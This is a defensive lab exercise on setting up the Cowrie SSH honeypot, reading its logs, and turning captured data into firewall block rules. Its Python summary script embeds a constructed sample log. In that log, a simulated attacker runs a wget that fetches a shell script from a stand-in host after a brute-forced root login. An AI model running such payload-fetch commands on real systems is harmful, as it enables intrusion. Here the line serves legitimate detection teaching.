Exercise 27: Creating a Honeypot to Detect Attacks

Feb 5, 2025

Objective

Deploy a simple honeypot to detect and log malicious activities, analyze attacker behavior, and identify potential threat actors.


Scenario

As a security analyst, you’re tasked with monitoring unauthorized access attempts to your network. A honeypot helps detect brute-force attacks and other malicious activity before it reaches real assets. In this exercise, you’ll set up Cowrie, a medium-interaction SSH and Telnet honeypot, as a lightweight SSH honeypot, monitor its logs for suspicious behavior, and analyze the captured data to identify attackers.

⚠️ Important: Perform this exercise in a controlled lab environment. Do not expose honeypots on production networks without proper security measures.


Lab Instructions

Step 1: Set Up the Environment

  • Use a virtual machine (VM) or a dedicated server for the honeypot, placed on an isolated network segment so that a compromised honeypot cannot reach production systems.
  • Install a Linux distribution (e.g., Ubuntu Server).
  • Create an unprivileged user to own and run the honeypot (e.g. sudo adduser --disabled-password cowrie, then sudo su - cowrie). Cowrie's start script refuses to run as root, and the authbind step below assumes this user exists.

Step 2: Install Cowrie Honeypot

Update the system:

sudo apt update && sudo apt upgrade -y

Install dependencies:

sudo apt install git python3 python3-venv python3-pip libssl-dev libffi-dev build-essential libpython3-dev -y

Clone the Cowrie repository:

git clone https://github.com/cowrie/cowrie.git
cd cowrie

Create a Python virtual environment:

python3 -m venv cowrie-env
source cowrie-env/bin/activate

Install required Python packages:

pip install -r requirements.txt

Step 3: Configure Cowrie

Copy the default configuration. Cowrie reads etc/cowrie.cfg.dist first and then etc/cowrie.cfg, so you can also create a cowrie.cfg that contains only the settings you change:

cp etc/cowrie.cfg.dist etc/cowrie.cfg

Edit the configuration file:

nano etc/cowrie.cfg

In the [ssh] section, change the listening endpoint from the shipped default (tcp:2222:interface=0.0.0.0) to port 22 so the honeypot looks like a real SSH server:

[ssh]
listen_endpoints = tcp:22:interface=0.0.0.0

Before doing this, move the host's own sshd, the one you administer the box through, to another port (change Port in /etc/ssh/sshd_config, restart sshd, and reconnect on the new port). Otherwise port 22 is already taken, Cowrie fails to bind it, and stopping sshd to free the port locks you out.

Cowrie must not run as root, so allow the unprivileged cowrie user to bind the privileged port 22 with authbind:

sudo apt install authbind -y
sudo touch /etc/authbind/byport/22
sudo chown cowrie:cowrie /etc/authbind/byport/22
sudo chmod 770 /etc/authbind/byport/22

authbind only takes effect when Cowrie is launched through it: set AUTHBIND_ENABLED=yes in bin/cowrie. The alternative the project documents is to leave Cowrie on port 2222 and add an iptables NAT PREROUTING rule that redirects incoming port 22 traffic to 2222.

Step 4: Start the Honeypot

Start Cowrie:

bin/cowrie start

Verify that the honeypot is running:

bin/cowrie status

Step 5: Monitor Honeypot Logs

Cowrie writes a human-readable log and, through the jsonlog output plugin that is enabled by default, a structured log with one JSON event per line:

tail -f var/log/cowrie/cowrie.log
tail -f var/log/cowrie/cowrie.json

Watch the "login attempt" lines for the usernames and passwords tried and whether each attempt failed or succeeded.

Commands typed by attackers who got past authentication appear in cowrie.log as lines prefixed with CMD:

grep "CMD:" var/log/cowrie/cowrie.log

Complete terminal sessions are recorded as binary TTY logs under var/lib/cowrie/tty/ (not as plain text), and are replayed with the bundled tool:

bin/playlog var/lib/cowrie/tty/<session-log>

Step 6: Analyze Collected Data

Identify source IP addresses of attackers. The address is the third comma-separated field of the bracketed transport prefix, not the last word on the line (which is "failed" or "succeeded"):

grep "login attempt" var/log/cowrie/cowrie.log | grep -oE 'Transport,[0-9]+,[0-9a-fA-F.:]+' | awk -F, '{print $3}' | sort | uniq -c | sort -nr

Extract the attempted credentials (the bracketed [user/password] part of each line) and rank them by frequency:

grep -oE 'login attempt \[[^]]*\]' var/log/cowrie/cowrie.log | sort | uniq -c | sort -nr

Step 7: Mitigation and Further Analysis

Use the data to block repeat offenders at the firewall of the systems you want to protect (blocking them on the honeypot itself only stops it from collecting data):

sudo iptables -A INPUT -s <malicious-ip> -j DROP

iptables rules do not survive a reboot; persist them with your distribution's tooling (e.g. iptables-persistent), and once the list grows, put the addresses in an ipset referenced by a single rule rather than one rule per IP. Report malicious IPs to threat-intelligence sharing services; Cowrie ships output plugins (the [output_*] sections of etc/cowrie.cfg.dist) that can forward events to external services automatically.
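The following script, added here as a worked example and not part of Cowrie or of the original exercise, does the Step 5 to 7 analysis over the structured cowrie.json log instead of grepping the text log: top source IPs, most-tried credentials, the commands run in each session, URLs attackers tried to fetch, and a block list of DROP rules for sources above a threshold. The embedded log lines are constructed for illustration (documentation and RFC 1918 addresses), not captured data; the field names (eventid, src_ip, session, username, password, input) are those Cowrie's jsonlog plugin writes. The file name cowrie_summary.py is my choice.

```python
"""Summarise a Cowrie JSON event log (var/log/cowrie/cowrie.json).

Added example for this exercise, not part of Cowrie. Field names follow the
events Cowrie's jsonlog output plugin writes: eventid, src_ip, session,
username/password for cowrie.login.*, input for cowrie.command.input.
"""
import json
import re
import sys
from collections import Counter, defaultdict

LOGIN_EVENTS = {"cowrie.login.failed", "cowrie.login.success"}
URL_RE = re.compile(r"https?://[^\s;|&]+")

# Constructed sample log, one JSON object per line as Cowrie writes it.
# Addresses are documentation/RFC1918 ranges; this is not captured data.
SAMPLE_JSON_LINES = """\
{"eventid":"cowrie.session.connect","src_ip":"192.168.1.200","session":"a1b2c3d4e5f6","timestamp":"2024-01-19T12:45:30.000000Z"}
{"eventid":"cowrie.login.failed","src_ip":"192.168.1.200","session":"a1b2c3d4e5f6","username":"root","password":"123456","timestamp":"2024-01-19T12:45:32.000000Z"}
{"eventid":"cowrie.login.failed","src_ip":"192.168.1.200","session":"a1b2c3d4e5f6","username":"root","password":"password","timestamp":"2024-01-19T12:45:34.000000Z"}
{"eventid":"cowrie.login.success","src_ip":"192.168.1.200","session":"a1b2c3d4e5f6","username":"root","password":"admin","timestamp":"2024-01-19T12:45:36.000000Z"}
{"eventid":"cowrie.command.input","src_ip":"192.168.1.200","session":"a1b2c3d4e5f6","input":"uname -a","timestamp":"2024-01-19T12:45:40.000000Z"}
{"eventid":"cowrie.command.input","src_ip":"192.168.1.200","session":"a1b2c3d4e5f6","input":"cd /tmp; wget http://198.51.100.7/x.sh","timestamp":"2024-01-19T12:45:45.000000Z"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.9","session":"0f0f0f0f0f0f","username":"admin","password":"admin","timestamp":"2024-01-19T12:50:01.000000Z"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.9","session":"0f0f0f0f0f0f","username":"root","password":"123456","timestamp":"2024-01-19T12:50:03.000000Z"}
this line is not JSON and must be skipped
"""


def parse_events(text):
    """Return a list of event dicts, skipping blank or corrupt lines: a line
    truncated during log rotation must not abort the whole analysis."""
    events = []
    for raw in text.splitlines():
        raw = raw.strip()
        if not raw:
            continue
        try:
            event = json.loads(raw)
        except json.JSONDecodeError:
            continue
        if isinstance(event, dict) and "eventid" in event:
            events.append(event)
    return events


def top_sources(events, n=10):
    """(src_ip, login attempts) pairs, most active first. Failed and succeeded
    logins both count; a bare connection without a login attempt does not."""
    counts = Counter(e["src_ip"] for e in events if e["eventid"] in LOGIN_EVENTS)
    return counts.most_common(n)


def top_credentials(events, n=10):
    """((username, password), count) pairs, most tried first."""
    counts = Counter(
        (e.get("username", ""), e.get("password", ""))
        for e in events if e["eventid"] in LOGIN_EVENTS
    )
    return counts.most_common(n)


def commands_by_session(events):
    """session id -> {"src_ip": ..., "commands": [...]} for sessions that got a shell."""
    sessions = defaultdict(lambda: {"src_ip": None, "commands": []})
    for e in events:
        if e["eventid"] == "cowrie.command.input":
            sessions[e["session"]]["src_ip"] = e["src_ip"]
            sessions[e["session"]]["commands"].append(e["input"])
    return dict(sessions)


def download_urls(events):
    """Sorted unique URLs attackers tried to fetch: payload-staging indicators
    worth checking against threat-intelligence feeds before visiting them."""
    urls = set()
    for info in commands_by_session(events).values():
        for cmd in info["commands"]:
            urls.update(URL_RE.findall(cmd))
    return sorted(urls)


def blocklist(events, min_attempts=2):
    """iptables DROP rules for sources with at least min_attempts login attempts.
    Apply them on the hosts you protect, not on the honeypot itself."""
    return [f"iptables -A INPUT -s {ip} -j DROP"
            for ip, count in top_sources(events, n=None) if count >= min_attempts]


EVENTS = parse_events(SAMPLE_JSON_LINES)

if __name__ == "__main__":
    # Usage: python3 cowrie_summary.py [var/log/cowrie/cowrie.json]
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as fh:
            events = parse_events(fh.read())
    else:
        events = EVENTS
    print("Top sources:", top_sources(events))
    print("Top credentials:", top_credentials(events))
    print("Download URLs:", download_urls(events))
    for sess, info in commands_by_session(events).items():
        print(f"Session {sess} from {info['src_ip']}: {info['commands']}")
    print("\n".join(blocklist(events)))
```

The threshold in blocklist matters: a single failed login from an address shared by many users behind NAT is weak evidence, while repeated attempts and a successful login followed by a download command are strong evidence. Tune min_attempts to the volume your honeypot sees, and treat the URLs as indicators to look up, not to fetch from your workstation.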


Solution & Explanation

How Honeypots Work

  • Honeypots simulate vulnerable services to lure attackers.
  • They record unauthorized access attempts and actions taken by attackers.

Why Honeypots Are Valuable

  • Early Detection: Detect brute-force attacks and exploitation attempts.
  • Behavior Analysis: Understand attacker tactics and tools.
  • Threat Intelligence: Identify malicious IPs and common attack vectors.

Example Log Entry

2024-01-19 12:45:32+0000 [SSHService b'ssh-userauth' on HoneyPotSSHTransport,1,192.168.1.200] login attempt [b'root'/b'123456'] failed

Read it as: timestamp, then the Twisted log prefix identifying the service and the connection (transport class, connection number, source IP), then the event itself. Recent Cowrie releases print the username and password as Python byte literals (b'root'), so a parser that expects plain text silently misses them; match on the bracketed [user/password] part as in Step 6, or use cowrie.json, where src_ip, username and password are separate fields.

Mitigation Strategies

  1. Deploy Honeypots Strategically: Place in DMZ or isolated networks.
  2. Monitor Regularly: Analyze logs for attack patterns.
  3. Block Malicious IPs: Use firewall rules or intrusion prevention systems.
  4. Share Threat Intelligence: Report attacker behavior to relevant databases.

Testing & Verification

  • From another machine, attempt to SSH into the honeypot with a few wrong passwords, then with credentials Cowrie accepts (see etc/userdb.example for the default credential rules): ssh root@<honeypot-ip>
  • Verify that each attempt appears as a "login attempt" line in cowrie.log (and as a cowrie.login.failed or cowrie.login.success event in cowrie.json), and that after a successful login the commands you type in the emulated shell are logged as CMD: lines.

Security Best Practices

  1. Isolate Honeypots: Prevent attackers from pivoting into production systems.
  2. Limit Data Exposure: Avoid deploying honeypots that store sensitive data.
  3. Use Threat Intelligence: Compare captured data with known attack indicators.
  4. Regular Updates and Fingerprint Changes: Keep Cowrie updated, and change the defaults that automated scanners use to recognise it, such as the emulated hostname (hostname in the [honeypot] section) and the advertised SSH banner (version in the [ssh] section).

Additional Script (Optional)

Automate Cowrie installation and setup. The script must be run as the unprivileged user that will own the honeypot (with sudo rights for the package and authbind steps), not with sudo itself, because Cowrie refuses to start as root. Move the host's own sshd off port 22 first, as in Step 3.

#!/bin/bash
# Automate Cowrie Honeypot Deployment. Run as the unprivileged user that will
# own the honeypot (with sudo rights); Cowrie refuses to start as root.
set -euo pipefail
sudo apt update
sudo apt install -y git python3 python3-venv python3-pip libssl-dev libffi-dev build-essential libpython3-dev authbind
# Clone into a directory owned by this user so venv, config and logs need no sudo
git clone https://github.com/cowrie/cowrie.git "$HOME/cowrie"
cd "$HOME/cowrie"
python3 -m venv cowrie-env
source cowrie-env/bin/activate
pip install -r requirements.txt
# etc/cowrie.cfg overrides etc/cowrie.cfg.dist; only the changed setting is needed
printf '[ssh]\nlisten_endpoints = tcp:22:interface=0.0.0.0\n' > etc/cowrie.cfg
# Let this user bind port 22 through authbind and make bin/cowrie use it
sudo touch /etc/authbind/byport/22
sudo chown "$USER" /etc/authbind/byport/22
sudo chmod 700 /etc/authbind/byport/22
sed -i 's/^AUTHBIND_ENABLED=no/AUTHBIND_ENABLED=yes/' bin/cowrie
bin/cowrie start
bin/cowrie status

Run the script:

chmod +x deploy_cowrie.sh
./deploy_cowrie.sh

Conclusion

In this exercise, you deployed and configured Cowrie as an SSH honeypot, monitored logs for brute-force attacks, and analyzed malicious activity. Honeypots provide valuable insights into attacker behavior and are essential for proactive network security.
